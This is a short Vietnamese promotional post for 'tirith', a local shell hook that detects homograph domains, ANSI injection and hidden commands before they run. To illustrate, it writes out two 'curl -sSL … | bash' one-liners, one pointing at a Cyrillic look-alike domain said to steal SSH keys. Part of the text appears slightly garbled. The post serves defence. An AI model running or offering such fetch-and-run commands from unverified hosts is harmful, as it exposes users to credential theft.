Hãy thành thật. Lần cuối cùng bạn thực sự đọc một lệnh trước khi dán nó vào cửa sổ dòng lệnh là khi nào? Vì hai đường này trông giống hệt nhau: curl -sSL install.example-cli | bash curl -sSL https://і|_2024111120231_|-clі | bash Một kẻ cài đặt công cụ của bạn. Kẻ kia đánh cắp khóa SSH của bạn. Chữ і đó là chữ Cyrillic. Không phải chữ Latin. Trình duyệt của bạn sẽ Block nó. Ngay cả màn hình terminal của bạn cũng không nhấp nháy. Lập trình theo kiểu "vibe coding" làm mọi thứ tệ hơn gấp 100 lần. Mọi người cứ sao chép lệnh từ ChatGPT và các kho lưu trữ ngẫu nhiên như thể chẳng có gì khó khăn. Chỉ cần một thao tác curl | bash sai lầm là chúng ta có thể mất tất cả dữ liệu. Vì vậy tôi đã tạo ra bản vá lỗi: "tirith". Một hook shell vô hình. Phát hiện các cuộc tấn công homograph, tấn công chèn ANSI, các lệnh ẩn, ghi đè dotfile trước khi chúng được thực thi. 30 quy tắc. Chỉ hoạt động cục bộ. Không thu thập dữ liệu từ xa.